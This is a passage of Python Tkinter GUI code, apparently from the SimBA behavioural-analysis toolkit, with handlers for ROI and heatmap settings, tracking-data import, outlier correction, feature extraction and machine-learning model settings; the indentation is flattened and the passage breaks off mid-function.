self.binlen.grid(row=animals2analyze+2,sticky=W)
runButton.grid(row=animals2analyze + 3, padx=10, pady=10)
def timebin_ml3(self,noofanimal,animalBp,binlen):
configini = self.projectconfigini
config = ConfigParser()
config.read(configini)
config.set('process movements', 'no_of_animals', str(noofanimal))
bp_vars_dist = self.animalVarList
for animal in range(noofanimal):
animalBp = str(bp_vars_dist[animal].get())
config.set('process movements', 'animal_' + str(animal+1) + '_bp', animalBp)
with open(configini, 'w') as configfile:
config.write(configfile)
time_bins_movement(configini,int(binlen))
def roi_settings(self,title,selection,text='Run'):
roisettings = Toplevel()
roisettings.minsize(400, 400)
roisettings.wm_title(title)
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
projectNoAnimals = config.getint('General settings', 'animal_no')
#first choice frame
firstMenu = LabelFrame(roisettings,text='Select number of animals')
## set up drop down for animals
noOfAnimalVar = IntVar()
animalOptions = set(range(1, projectNoAnimals+1))
noOfAnimalVar.set(1)
animalMenu = OptionMenu(firstMenu,noOfAnimalVar,*animalOptions)
animalLabel = Label(firstMenu,text="# of animals")
setAnimalButton = Button(firstMenu,text="Confirm",command=lambda:self.run_roiAnalysisSettings(roisettings,noOfAnimalVar,selection,text=text))
#organize
firstMenu.grid(row=0,sticky=W)
animalLabel.grid(row=0,column=0,sticky=W)
animalMenu.grid(row=0,column=1,sticky=W)
setAnimalButton.grid(row=0,column=2,sticky=W)
def run_roiAnalysisSettings(self,master,noofanimal,appendornot,text='Run'):
try:
self.secondMenu.destroy()
except:
pass
self.secondMenu = LabelFrame(master,text="Choose bodyparts")
self.p_threshold_a = Entry_Box(self.secondMenu,'Bp probability threshold','20')
#try to see if it exist or not
configini = self.projectconfigini
config = ConfigParser()
config.read(configini)
try:
pthresh = config.get('ROI settings', 'probability_threshold')
self.p_threshold_a.entry_set(pthresh)
except:
self.p_threshold_a.entry_set(0.00)
self.disvar = IntVar()
discheckbox = Checkbutton(self.secondMenu,text='Calculate distance moved within ROI',variable=self.disvar)
runButton = Button(self.secondMenu,text=text,command =lambda:self.run_analyze_roi(noofanimal.get(), self.animalVarList[animal], appendornot))
animals2analyze = noofanimal.get()
labelFrameList, labelList, self.animalVarList, AnimalStringVarList, optionsVarList, animalBodyMenuList = [],[],[],[],[],[]
options = define_bp_drop_down(configini)
if appendornot != 'locationheatmap':
for animal in range(animals2analyze):
animalName = str(animal + 1)
labelFrameList.append(LabelFrame(self.secondMenu,text='Animal ' + animalName))
labelList.append(Label(labelFrameList[animal],text='Bodypart'))
self.animalVarList.append(StringVar())
self.animalVarList[animal].set(options[animal][0])
animalBodyMenuList.append(OptionMenu(labelFrameList[animal], self.animalVarList[animal], *options[animal]))
if appendornot == 'locationheatmap':
options = [item for sublist in options for item in sublist]
labelFrameList.append(LabelFrame(self.secondMenu,text='Animal bodypart'))
labelList.append(Label(labelFrameList[0], text='Bodypart'))
self.animalVarList.append(StringVar())
self.animalVarList[0].set(options[0])
animalBodyMenuList.append(OptionMenu(labelFrameList[0], self.animalVarList[0], *options))
#organize
self.secondMenu.grid(row=1, sticky=W)
for animal in range(animals2analyze):
labelFrameList[animal].grid(row=animal,column=0, sticky=W)
labelList[animal].grid(row=0, column=0, sticky=W)
animalBodyMenuList[animal].grid(row=animal, column=0, sticky=W)
if appendornot != 'locationheatmap':
self.p_threshold_a.grid(row=animals2analyze+1, sticky=W)
discheckbox.grid(row=animals2analyze+2, sticky=W)
runButton.grid(row=animals2analyze+3, padx=10, pady=10)
if appendornot == 'locationheatmap':
heatmapframe = Frame(self.secondMenu)
self.binsizepixels = Entry_Box(heatmapframe,'Bin size (mm)','21')
self.scalemaxsec = Entry_Box(heatmapframe,'max','21')
self.pal_var = StringVar()
paloptions = ['magma','jet','inferno','plasma','viridis','gnuplot2']
palette = OptionMenu(heatmapframe,self.pal_var,*paloptions)
self.pal_var.set(paloptions[0])
self.lastimgvar =IntVar()
lastimg = Checkbutton(heatmapframe,text='Save last image only (if unticked heatmap videos are created)',variable=self.lastimgvar)
newoptions = [item for sublist in options for item in sublist]
self.animalbody1var = StringVar()
# self.animalbody1var.set(newoptions[0])
animalbodymenu1 = OptionMenu(heatmapframe, self.animalbody1var, *newoptions)
#organize
heatmapframe.grid(row=5,sticky=W)
# animalbodymenu1.grid(row=0, column=0, sticky=W)
self.binsizepixels.grid(row=1,sticky=W)
self.scalemaxsec.grid(row=2,sticky=W)
palette.grid(row=4,sticky=W)
lastimg.grid(row=5,sticky=W)
runButton.grid(row=6, padx=10, pady=10)
def run_analyze_roi(self,noofanimal,animalVarList,appendornot):
print(animalVarList)
configini = self.projectconfigini
config = ConfigParser()
config.read(configini)
if appendornot == 'processmovement':
config.set('process movements', 'no_of_animals', str(noofanimal))
bp_vars_dist = self.animalVarList
for animal in range(noofanimal):
animalBp = str(bp_vars_dist[animal].get())
config.set('process movements', 'animal_' + str(animal+1) + '_bp', animalBp)
with open(configini, 'w') as configfile:
config.write(configfile)
elif appendornot == 'locationheatmap':
animalBp = str(animalVarList.get())
config.set('Heatmap location', 'body_part', animalBp)
config.set('Heatmap location', 'Palette', str(self.pal_var.get()))
config.set('Heatmap location', 'Scale_max_seconds', str(self.scalemaxsec.entry_get))
config.set('Heatmap location', 'bin_size_pixels', str(self.binsizepixels.entry_get))
with open(configini, 'w') as configfile:
config.write(configfile)
else:
config.set('ROI settings', 'no_of_animals', str(noofanimal))
bp_vars_ROI = self.animalVarList
for animal in range(noofanimal):
currStr = 'animal_' + str(animal+1) + '_bp'
config.set('ROI settings', currStr, str(bp_vars_ROI[animal].get()))
with open(configini, 'w') as configfile:
config.write(configfile)
if appendornot == 'append':
ROItoFeatures(configini)
elif appendornot =='not append':
if self.disvar.get()==1:
caldist = True
else:
caldist = False
#write into configini
config.set('ROI settings', 'probability_threshold', str(self.p_threshold_a.entry_get))
with open(configini, 'w') as configfile:
config.write(configfile)
roiAnalysis(configini,'outlier_corrected_movement_location',caldist)
elif appendornot == 'processmovement':
ROI_process_movement(configini)
elif appendornot == 'locationheatmap':
plotHeatMapLocation(configini,animalBp,int(self.binsizepixels.entry_get),str(self.scalemaxsec.entry_get),self.pal_var.get(),self.lastimgvar.get())
elif appendornot == 'direction':
print('ROI settings saved.')
else:
roiAnalysis(configini,'features_extracted')
def updateThreshold(self):
updateThreshold_graph(self.projectconfigini, self.csvfile.file_path, self.modelfile.file_path)
def getEntry(self):
# rectangle
recName = []
recWidth = []
recHeight = []
rec_shape = []
try:
for i in range(len(self.rect_list)):
rec_shape.append("Rectangle")
recName.append(self.rect_list[i].get())
recWidth.append(int(self.rec_width_list[i].get()))
recHeight.append(int(self.rec_height_list[i].get()))
rec_df = pd.DataFrame(list(zip(rec_shape, recName, recWidth, recHeight)), columns=['Shape_type', 'Name', 'width', 'height'])
except:
rec_df = pd.DataFrame()
# circle
cirName = []
cirRadius = []
cir_shape = []
try:
for i in range(len(self.cir_entry_list)):
cir_shape.append("Circle")
cirName.append(self.cir_entry_list[i].get())
cirRadius.append(int(self.cir_radius_list[i].get()))
cir_df = pd.DataFrame(list(zip(cir_shape, cirName, cirRadius)), columns=['Shape_type', 'Name', 'Radius'])
except:
cir_df = pd.DataFrame()
## polygon
polName = []
polShape = []
try:
for i in range(len(self.pol_list)):
polShape.append("Polygon")
polName.append(self.pol_list[i].get())
pol_df = pd.DataFrame(list(zip(polShape, polName)), columns=['Shape_type', 'Name'])
except:
pol_df = pd.DataFrame()
if not os.path.exists(os.path.join(os.path.dirname(self.projectconfigini),"logs","measures")):
os.makedirs(os.path.join(os.path.dirname(self.projectconfigini),"logs","measures"))
### to h5
storePath = os.path.join(os.path.dirname(self.projectconfigini),"logs","measures",'ROI_index.h5')
store = pd.HDFStore(storePath, mode='w')
store['rectangles'] = rec_df
store['circleDf'] = cir_df
store['polygons'] = pol_df
store.close()
videodir = os.path.join(os.path.dirname(self.projectconfigini),'videos')
roitableMenu(videodir,self.projectconfigini)
def table(self,master,rectangle,circle,polygon):
# refresh the frames
try:
self.rectbox.destroy()
self.cirbox.destroy()
self.polbox.destroy()
except:
pass
try:
## make rectangle table
self.rectbox = LabelFrame(master)
self.rectbox.grid(row=6, sticky=W, pady=10)
self.rect_list = list(range(int(rectangle)))
self.rec_width_list = list(range(int(rectangle)))
self.rec_height_list = list(range(int(rectangle)))
rect_var = list(range(int(rectangle)))
rec_name_list = list(range(int(rectangle)))
#
rectangleName = Label(self.rectbox, text="Rectangle Name")
rectangleName.grid(row=0, column=1)
rectangleWidth = Label(self.rectbox, text="Width")
rectangleWidth.grid(row=0, column=2)
rectangleHeight = Label(self.rectbox, text="Height")
rectangleHeight.grid(row=0, column=3)
for i in range(len(self.rect_list)):
rec_name_list[i] = Label(self.rectbox, text="Rectangle " + str(i + 1))
rec_name_list[i].grid(row=int(i) + 1, padx=5, sticky=W)
self.rect_list[i] = Entry(self.rectbox)
self.rect_list[i].grid(row=int(i) + 1, column=1, padx=5)
rect_var[i]=StringVar()
self.rec_width_list[i] = Entry(self.rectbox,textvariable=rect_var[i])
self.rec_width_list[i].grid(row=int(i) + 1, column=2, padx=5)
self.rec_height_list[i] = Entry(self.rectbox,textvariable=rect_var[i])
self.rec_height_list[i].grid(row=int(i) + 1, column=3, padx=5)
rect_var[i].set('0')
except:
pass
try:
## make circle table
self.cirbox = LabelFrame(master)
self.cirbox.grid(row=7, sticky=W)
cir_list = list(range(int(circle)))
self.cir_entry_list = list(range(int(circle)))
self.cir_radius_list = list(range(int(circle)))
cir_var = list(range(int(circle)))
circleName = Label(self.cirbox, text="Circle Name")
circleName.grid(row=0, column=1)
radiusName = Label(self.cirbox, text='Radius')
radiusName.grid(row=0, column=2)
for i in range(len(cir_list)):
cir_list[i] = Label(self.cirbox, text=("Circle " + str(i + 1)))
cir_list[i].grid(row=int(i) + 1, padx=5, sticky=W)
self.cir_entry_list[i] = Entry(self.cirbox)
self.cir_entry_list[i].grid(row=int(i) + 1, column=1, padx=5)
cir_var[i] = StringVar()
self.cir_radius_list[i] = Entry(self.cirbox,textvariable=cir_var[i])
self.cir_radius_list[i].grid(row=int(i) + 1, column=2, padx=5)
cir_var[i].set('0')
except:
pass
try:
## make polygon table/.;p
self.polbox = LabelFrame(master)
self.polbox.grid(row=8, sticky=W)
self.pol_list = list(range(int(polygon)))
pol_name = list(range(int(polygon)))
polygonName = Label(self.polbox, text="Polygon Name")
polygonName.grid(row=0, column=1)
for i in range(len(pol_name)):
pol_name[i] = Label(self.polbox, text="Polygon " + str(i + 1))
pol_name[i].grid(row=int(i) + 1, column=0, sticky=W)
self.pol_list[i] = Entry(self.polbox)
self.pol_list[i].grid(row=int(i) + 1, column=1, padx=5)
except:
pass
setbutton = Button(master,text='Set Shape Definitions',command=self.setvariables)
setbutton.grid(row=10)
def setvariables(self):
measuresdir = os.path.join(os.path.dirname(self.projectconfigini),'logs','measures')
try:
os.remove(os.path.join(measuresdir,'ROI_definitions.h5'))
os.remove(os.path.join(measuresdir, 'ROI_index.h5'))
except:
pass
self.getEntry()
def classifiervalidation(self):
print('Generating video...')
validate_classifier(self.projectconfigini, self.seconds.entry_get,self.cvTarget.getChoices())
print('Videos generated')
def mergeframesofplot(self,var):
inputList = []
for i in var:
inputList.append(i.get())
mergeframesPlot(self.projectconfigini,inputList)
def generateSimBPlotlyFile(self,var):
inputList = []
for i in var:
inputList.append(i.get())
create_plotly_container(self.projectconfigini, inputList)
def open_web_link(self, url):
sys.excepthook = cef.ExceptHook # To shutdown all CEF processes on error
cef.Initialize()
cef.CreateBrowserSync(url=url,
window_title=url)
cef.MessageLoop()
def open_plotly_interface(self, url):
# kill any existing plotly cache
try:
self.p.kill()
self.p2.kill()
except:
print('Starting plotly')
#get h5 file path and csv file path
filePath, groupPath = self.plotly_file.file_path, self.groups_file.file_path
#print file read
if filePath.endswith('.h5'):
print('Reading in',os.path.basename(filePath))
elif groupPath.endswith('.csv'):
print('Reading in',os.path.basename(groupPath))
self.p = subprocess.Popen([sys.executable, os.path.join(os.path.dirname(__file__),'SimBA_dash_app.py'), filePath, groupPath])
# csvPath = os.path.join(os.path.dirname(self.projectconfigini),'csv')
# p = subprocess.Popen([sys.executable, r'simba\SimBA_dash_app.py', filePath, groupPath, csvPath])
wait_for_internet_connection(url)
self.p2 = subprocess.Popen([sys.executable, os.path.join(os.path.dirname(__file__),'run_dash_tkinter.py'), url])
subprocess_children = [self.p, self.p2]
atexit.register(terminate_children, subprocess_children)
def plotdataplot(self):
configini = self.projectconfigini
config = ConfigParser()
config.read(configini)
pose_config_setting = config.get('create ensemble settings', 'pose_estimation_body_parts')
if pose_config_setting == 'user_defined':
data_plot_config(self.projectconfigini, self.SelectedBp.getChoices())
else:
data_plot_config(self.projectconfigini, 'Centroid')
def plotsklearn_result(self):
configini = self.projectconfigini
config = ConfigParser()
config.read(configini)
plotsklearnresult(self.projectconfigini,self.videovar.get(),self.genframevar.get())
def analyzseverity(self):
analyze_process_severity(self.projectconfigini,self.severityscale.entry_get,self.severityTarget.getChoices())
def analyzedatalog(self):
# Popup window
datalogmenu = Toplevel()
datalogmenu.minsize(400, 400)
datalogmenu.wm_title("Analyze process log settings")
dlmlabel = LabelFrame(datalogmenu)
#use for loop to create intvar
var=[]
for i in range(7):
var.append(IntVar())
#use loop to create checkbox?
checkbox = [0]*7
titlebox =['# bout events', 'total events duration (s)','mean bout duration (s)', 'median bout duration (s)', 'first occurance (s)', 'mean interval (s)', 'median interval (s)']
for i in range(7):
checkbox[i] = Checkbutton(dlmlabel,text=titlebox[i],variable=var[i])
checkbox[i].grid(row=i,sticky=W)
#organize
dlmlabel.grid(row=0)
button1 = Button(dlmlabel,text='Analyze',command=lambda:self.findDatalogList(titlebox,var))
button1.grid(row=10)
def findDatalogList(self,titleBox,Var):
finallist = []
for index,i in enumerate(Var):
if i.get()==0:
finallist.append(titleBox[index])
#run analyze
analyze_process_data_log(self.projectconfigini,finallist)
def runrfmodel(self):
rfmodel(self.projectconfigini)
def modelselection(self):
runmachinemodelsettings(self.projectconfigini)
def validatemodelsinglevid(self):
validate_model_one_vid(self.projectconfigini, self.csvfile.file_path, self.modelfile.file_path, self.dis_threshold.entry_get, self.min_behaviorbout.entry_get,self.ganttvar.get())
def trainmultimodel(self):
train_multimodel(self.projectconfigini)
def trainmachinemodelsetting(self):
trainmachinemodel_settings(self.projectconfigini)
def extractfeatures(self):
configini = self.projectconfigini
config = ConfigParser()
config.read(configini)
pose_estimation_body_parts = config.get('create ensemble settings', 'pose_estimation_body_parts')
print('Pose-estimation body part setting for feature extraction: ' + str(pose_estimation_body_parts))
userFeatureScriptStatus = self.usVar.get()
print(userFeatureScriptStatus)
if userFeatureScriptStatus == 1:
pose_estimation_body_parts == 'user_defined_script'
import sys
script = self.scriptfile.file_path
print(script)
dir = os.path.dirname(script)
fscript = os.path.basename(script).split('.')[0]
sys.path.insert(0,dir)
import importlib
mymodule = importlib.import_module(fscript)
mymodule.extract_features_userdef(self.projectconfigini)
if userFeatureScriptStatus == 0:
if pose_estimation_body_parts == '16':
extract_features_wotarget_16(self.projectconfigini)
if (pose_estimation_body_parts == '14'):
extract_features_wotarget_14(self.projectconfigini)
if (pose_estimation_body_parts == '987'):
extract_features_wotarget_14_from_16(self.projectconfigini)
if pose_estimation_body_parts == '9':
extract_features_wotarget_9(self.projectconfigini)
if pose_estimation_body_parts == '8':
extract_features_wotarget_8(self.projectconfigini)
if pose_estimation_body_parts == '7':
extract_features_wotarget_7(self.projectconfigini)
if pose_estimation_body_parts == '4':
extract_features_wotarget_4(self.projectconfigini)
if pose_estimation_body_parts == 'user_defined':
extract_features_wotarget_user_defined(self.projectconfigini)
def importframefolder(self):
if (self.projectconfigini!='No file selected') and (self.frame_folder.folder_path != 'No folder selected'):
copy_frame_folders(self.frame_folder.folder_path, self.projectconfigini)
else:
print('Fail to import frame folder, please select a main directory containing all the frame folders')
def importvideo_single(self):
if (self.projectconfigini != 'No file selected') and (self.singlevideopath.file_path != 'No file selected'):
copy_singlevideo_ini(self.projectconfigini, self.singlevideopath.file_path)
else:
print('Fail to import video, please select a video to import')
def importvideo_multi(self):
if (self.projectconfigini != 'No file selected') and (self.multivideofolderpath.folder_path != 'No folder selected') and (self.video_type.entry_get != ''):
copy_multivideo_ini(self.projectconfigini, self.multivideofolderpath.folder_path,self.video_type.entry_get)
else:
print('Fail to import videos, please select folder with videos and enter the file format')
def importdlctracking_single(self):
if (self.projectconfigini != 'No file selected') and (self.file_csv.file_path != 'No file selected'):
copy_singlecsv_ini(self.projectconfigini, self.file_csv.file_path)
# read in configini
configFile = str(self.projectconfigini)
config = ConfigParser()
config.read(configFile)
animalIDlist = config.get('Multi animal IDs', 'id_list')
if not animalIDlist:
csvfile = os.path.join(os.path.dirname(self.projectconfigini), 'csv', 'input_csv',
os.path.basename(self.file_csv.file_path))
df = pd.read_csv(csvfile)
tmplist = []
for i in df.loc[0]:
tmplist.append(i)
if 'individuals' in tmplist:
tmplist.remove('individuals')
if len(set(tmplist)) == 1:
print('single animal using maDLC detected. Removing "individuals" row...')
df = df.iloc[1:]
df.to_csv(csvfile, index=False)
print('Row removed for',os.path.basename(i))
else:
pass
print('Finished importing tracking data.')
else:
print('Fail to import csv file , please select a csv file to import and load config.ini file')
def importdlctracking_multi(self):
if (self.projectconfigini !='No file selected') and (self.folder_csv.folder_path!= 'No folder selected'):
copy_allcsv_ini(self.projectconfigini, self.folder_csv.folder_path)
# read in configini
configFile = str(self.projectconfigini)
config = ConfigParser()
config.read(configFile)
animalIDlist = config.get('Multi animal IDs', 'id_list')
if not animalIDlist:
# get all csv in project folder input csv
csvfolder = os.path.join(os.path.dirname(self.projectconfigini), 'csv', 'input_csv')
allcsvs = []
for i in os.listdir(csvfolder):
if i.endswith('.csv'):
csvfile = os.path.join(csvfolder, i)
allcsvs.append(csvfile)
# screen for madlc format but single animal
for i in allcsvs:
df = pd.read_csv(i)
tmplist = []
for j in df.loc[0]:
tmplist.append(j)
# if it is madlc
if 'individuals' in tmplist:
tmplist.remove('individuals')
# if only single animal in madlc
if len(set(tmplist)) == 1:
print('single animal using maDLC detected. Removing "individuals" row...')
df = df.iloc[1:]
df.to_csv(i, index=False)
print('Row removed for',os.path.basename(i))
else:
pass
print('Finished importing tracking data.')
else:
print('Fail to import csv file, please select folder with the .csv files and load config.ini file')
def set_distancemm(self, distancemm):
configini = self.projectconfigini
config = ConfigParser()
config.read(configini)
config.set('Frame settings', 'distance_mm', distancemm)
with open(configini, 'w') as configfile:
config.write(configfile)
def extract_frames_loadini(self):
configini = self.projectconfigini
videopath = os.path.join(os.path.dirname(configini), 'videos')
extract_frames_ini(videopath, configini)
def correct_outlier(self):
configini = self.projectconfigini
config = ConfigParser()
config.read(configini)
pose_estimation_body_parts = config.get('create ensemble settings', 'pose_estimation_body_parts')
print('Pose-estimation body part setting for outlier correction: ' + str(pose_estimation_body_parts))
if (pose_estimation_body_parts == '16') or (pose_estimation_body_parts == '987'):
dev_move_16(configini)
dev_loc_16(configini)
if pose_estimation_body_parts == '14':
dev_move_14(configini)
dev_loc_14(configini)
if (pose_estimation_body_parts == 'user_defined') or (pose_estimation_body_parts == '4') or (pose_estimation_body_parts == '7') or (pose_estimation_body_parts == '8') or (pose_estimation_body_parts == '9'):
dev_move_user_defined(configini)
dev_loc_user_defined(configini)
print('Outlier correction complete.')
def distanceplotcommand(self):
configini = self.projectconfigini
config = ConfigParser()
config.read(configini)
config.set('Distance plot', 'POI_1', self.poi1.getChoices())
config.set('Distance plot', 'POI_2', self.poi2.getChoices())
with open(configini, 'w') as configfile:
config.write(configfile)
line_plot_config(configini)
print('Distance plot complete.')
def pathplotcommand(self):
configini = self.projectconfigini
config = ConfigParser()
config.read(configini)
config.set('Path plot settings', 'no_animal_pathplot', self.noofAnimal.getChoices())
config.set('Path plot settings', 'deque_points', self.Deque_points.entry_get)
config.set('Path plot settings', 'severity_brackets', self.severity_brackets.entry_get)
config.set('Path plot settings', 'animal_1_bp', self.Bodyparts1.getChoices())
config.set('Path plot settings', 'animal_2_bp', self.Bodyparts2.getChoices())
config.set('Path plot settings','severity_target',self.severityTargetpp.getChoices())
if self.plotsvvar.get()==1:
config.set('Path plot settings', 'plot_severity', 'yes')
else:
config.set('Path plot settings', 'plot_severity', 'no')
with open(configini, 'w') as configfile:
config.write(configfile)
path_plot_config(configini)
print('Path plot complete.')
def heatmapcommand(self):
configini = self.projectconfigini
config = ConfigParser()
config.read(configini)
config.set('Heatmap settings', 'bin_size_pixels', self.BinSize.entry_get)
config.set('Heatmap settings', 'Scale_max_seconds', self.MaxScale.entry_get)
config.set('Heatmap settings', 'Palette', self.hmMenu.getChoices())
config.set('Heatmap settings', 'Target', self.targetMenu.getChoices())
config.set('Heatmap settings', 'body_part', self.bp1.getChoices())
with open(configini, 'w') as configfile:
config.write(configfile)
plotHeatMap(configini,self.bp1.getChoices(),int(self.BinSize.entry_get),str(self.MaxScale.entry_get)
,self.hmMenu.getChoices(), self.targetMenu.getChoices(),self.intimgvar.get() )
def callback(self,url):
webbrowser.open_new(url)
class trainmachinemodel_settings:
def __init__(self,inifile):
self.configini = str(inifile)
# Popup window
trainmmsettings = Toplevel()
trainmmsettings.minsize(400, 400)
trainmmsettings.wm_title("Machine model settings")
trainmms = Canvas(hxtScrollbar(trainmmsettings))
trainmms.pack(expand=True,fill=BOTH)
#load metadata
load_data_frame = LabelFrame(trainmms, text='Load Metadata',font=('Helvetica',10,'bold'), pady=5, padx=5)
self.load_choosedata = FileSelect(load_data_frame,'File Select',title='Select a meta (.csv) file')
load_data = Button(load_data_frame, text = 'Load', command = self.load_RFvalues,fg='blue')
#link to github
label_git_hyperparameters = Label(trainmms,text='[Click here to learn about the Hyperparameters]',cursor='hand2',fg='blue')
label_git_hyperparameters.bind('<Button-1>',lambda e: webbrowser.open_new('https://github.com/sgoldenlab/simba/blob/master/docs/tutorial.md#step-7-train-machine-model'))
#setting drop downs
label_mm = LabelFrame(trainmms, text='Machine model',font=('Helvetica',10,'bold'), pady=5, padx=5)
label_choosemm = Label(label_mm, text='Choose machine model:')
options =['RF','GBC','Xboost']
self.var = StringVar()
self.var.set(options[0]) #set as default value
modeldropdown = OptionMenu(label_mm,self.var,*options)
self.meta_dict = {}
## hyperparameter settings
label_settings = LabelFrame(trainmms, text='Hyperparameters',font=('Helvetica',10,'bold'),pady=5,padx=5)
self.settings = []
self.label_nestimators = Entry_Box(label_settings,'RF N Estimators','25')
self.label_maxfeatures = Entry_Box(label_settings,'RF Max features','25')
self.label_criterion = Entry_Box(label_settings,'RF Criterion','25')
self.label_testsize = Entry_Box(label_settings,'Train Test Size','25')
self.label_minsampleleaf = Entry_Box(label_settings,'RF Min sample leaf','25')
self.label_under_s_settings = Entry_Box(label_settings, 'Under sample setting', '25')
self.label_under_s_correctionvalue = Entry_Box(label_settings,'Under sample ratio','25')
self.label_over_s_settings = Entry_Box(label_settings, 'Over sample setting', '25')
self.label_over_s_ratio = Entry_Box(label_settings,'Over sample ratio','25')
self.settings = [self.label_nestimators, self.label_maxfeatures, self.label_criterion, self.label_testsize,
self.label_minsampleleaf, self.label_under_s_correctionvalue,self.label_under_s_settings,
self.label_over_s_ratio,self.label_over_s_settings]
## model evaluation settings for checkboxes
self.label_settings_box = LabelFrame(trainmms,pady=5,padx=5,text='Model Evaluations Settings',font=('Helvetica',10,'bold'))
self.box1 = IntVar()
self.box2 = IntVar()
self.box3 = IntVar()
self.box4 = IntVar()
self.box5 = IntVar()
self.box6 = IntVar()
self.box7 = IntVar()
self.box8 = IntVar()
self.box9 = IntVar()
self.box10 = IntVar()
# model evaluations for entrybox
self.LC_ksplit = Entry_Box(self.label_settings_box, 'LearningCurve shuffle K splits', '25',status=DISABLED)
self.LC_datasplit = Entry_Box(self.label_settings_box, 'LearningCurve shuffle Data splits', '25',status=DISABLED)
self.label_n_feature_importance_bars = Entry_Box(self.label_settings_box, 'N feature importance bars', '25',status=DISABLED)
self.shap_present = Entry_Box(self.label_settings_box,'# target present', '25',status=DISABLED)
self.shap_absent = Entry_Box(self.label_settings_box, '# target absent', '25', status=DISABLED)
self.settings.extend([self.LC_ksplit, self.LC_datasplit, self.label_n_feature_importance_bars,self.shap_present,self.shap_absent])
def activate(box, *args):
for entry in args:
if box.get() == 0:
entry.set_state(DISABLED)
elif box.get() == 1:
entry.set_state(NORMAL)
checkbutton1 = Checkbutton(self.label_settings_box,text='Generate RF model meta data file',variable = self.box1)
checkbutton2 = Checkbutton(self.label_settings_box, text='Generate Example Decision Tree (requires "graphviz")', variable=self.box2)
checkbutton3 = Checkbutton(self.label_settings_box, text='Generate Fancy Example Decision Tree ("dtreeviz")', variable=self.box3)
checkbutton4 = Checkbutton(self.label_settings_box, text='Generate Classification Report', variable=self.box4)
# checkbutton5 = Checkbutton(self.label_settings_box, text='Generate Features Importance Log', variable=self.box5)
checkbutton6 = Checkbutton(self.label_settings_box, text='Generate Features Importance Bar Graph', variable=self.box6,
command = lambda:activate(self.box6, self.label_n_feature_importance_bars))
checkbutton7 = Checkbutton(self.label_settings_box, text='Compute Feature Permutation Importances (Note: CPU intensive)', variable=self.box7)
checkbutton8 = Checkbutton(self.label_settings_box, text='Generate Sklearn Learning Curves (Note: CPU intensive)', variable=self.box8,
command = lambda:activate(self.box8, self.LC_datasplit, self.LC_ksplit))
checkbutton9 = Checkbutton(self.label_settings_box, text='Generate Precision Recall Curves', variable=self.box9)
checkbutton10 = Checkbutton(self.label_settings_box,text='Calculate SHAP scores',variable=self.box10,command= lambda:activate(self.box10,self.shap_present,self.shap_absent))
self.check_settings = [checkbutton1, checkbutton2, checkbutton3, checkbutton4, checkbutton6,
checkbutton7, checkbutton8, checkbutton9, checkbutton10]
# setting drop downs for modelname
configini = self.configini
config = ConfigParser()
config.read(configini)
number_of_model = config['SML settings'].getint('No_targets')
model_list = []
count = 1
for i in range(number_of_model):
a = str('target_name_' + str(count))
model_list.append(config['SML settings'].get(a))
count += 1
labelf_modelname = LabelFrame(trainmms,text='Model',font=('Helvetica',10,'bold'),pady=5,padx=5)
label_modelname = Label(labelf_modelname,text='Model name')
self.varmodel = StringVar()
self.varmodel.set(model_list[0]) # set as default value
model_name_dropdown = OptionMenu(labelf_modelname, self.varmodel, *model_list)
# button
button_settings_to_ini = Button(trainmms, text='Save settings into global environment', font=('Helvetica', 10, 'bold'),fg='blue', command=self.set_values)
button_save_meta = Button(trainmms, text='Save settings for specific model', font=('Helvetica', 10, 'bold'),fg='green' ,command=self.save_new)
button_remove_meta = Button(trainmms,text='Clear cache',font=('Helvetica', 10, 'bold'),fg='red',command = self.clearcache)
# organize
load_data_frame.grid(row=0, sticky=W, pady=5, padx=5)
self.load_choosedata.grid(row=0, column=0, sticky=W)
load_data.grid(row=1, column=0)
label_mm.grid(row=1, sticky=W, pady=5)
label_choosemm.grid(row=0, column=0, sticky=W)
modeldropdown.grid(row=0, column=1, sticky=W)
labelf_modelname.grid(row=2, sticky=W, pady=5)
label_modelname.grid(row=0, column=0, sticky=W)
model_name_dropdown.grid(row=0, column=1, sticky=W)
label_git_hyperparameters.grid(row=3,sticky=W)
label_settings.grid(row=4, sticky=W, pady=5)
self.label_nestimators.grid(row=1, sticky=W)
self.label_maxfeatures.grid(row=2, sticky=W)
self.label_criterion.grid(row=3, sticky=W)
self.label_testsize.grid(row=4, sticky=W)
self.label_minsampleleaf.grid(row=7, sticky=W)
self.label_under_s_settings.grid(row=8, sticky=W)
self.label_under_s_correctionvalue.grid(row=9, sticky=W)
self.label_over_s_settings.grid(row=10, sticky=W)
self.label_over_s_ratio.grid(row=11,sticky=W)
self.label_settings_box.grid(row=5,sticky=W)
checkbutton1.grid(row=0,sticky=W)
checkbutton2.grid(row=1,sticky=W)
checkbutton3.grid(row=2,sticky=W)
checkbutton4.grid(row=3,sticky=W)
# checkbutton5.grid(row=4,sticky=W)
checkbutton6.grid(row=5,sticky=W)
self.label_n_feature_importance_bars.grid(row=6, sticky=W)
checkbutton7.grid(row=7,sticky=W)
checkbutton8.grid(row=8, sticky=W)
self.LC_ksplit.grid(row=9, sticky=W)
self.LC_datasplit.grid(row=10, sticky=W)
checkbutton9.grid(row=11, sticky=W)
checkbutton10.grid(row=12,sticky=W)
self.shap_present.grid(row=13,sticky=W)
self.shap_absent.grid(row=14,sticky=W)
button_settings_to_ini.grid(row=6,pady=5)
button_save_meta.grid(row=7)
button_remove_meta.grid(row=8,pady=5)
def clearcache(self):
configs_dir = os.path.join(os.path.dirname(self.configini),'configs')
filelist = [f for f in os.listdir(configs_dir) if f.endswith('.csv')]
for f in filelist:
os.remove(os.path.join(configs_dir,f))
print(f,'deleted')
def load_RFvalues(self):
metadata = pd.read_csv(str(self.load_choosedata.file_path), index_col=False)
# metadata = metadata.drop(['Feature_list'], axis=1)
for m in metadata.columns:
self.meta_dict[m] = metadata[m][0]
print('Meta data file loaded')
for key in self.meta_dict:
cur_list = key.lower().split(sep='_')
# print(cur_list)
for i in self.settings:
string = i.lblName.cget('text').lower()
if all(map(lambda w: w in string, cur_list)):
i.entry_set(self.meta_dict[key])
for k in self.check_settings:
string = k.cget('text').lower()
if all(map(lambda w: w in string, cur_list)):
if self.meta_dict[key] == 'yes':
k.select()
elif self.meta_dict[key] == 'no':
k.deselect()
def get_checkbox(self):
### check box settings
if self.box1.get() == 1:
self.rfmetadata = 'yes'
else:
self.rfmetadata = 'no'
if self.box2.get() == 1:
self.generate_example_d_tree = 'yes'
else:
self.generate_example_d_tree = 'no'
if self.box3.get() == 1:
self.generate_example_decision_tree_fancy = 'yes'
else:
self.generate_example_decision_tree_fancy = 'no'
if self.box4.get() == 1:
self.generate_classification_report = 'yes'
else:
self.generate_classification_report = 'no'
if self.box5.get() == 1:
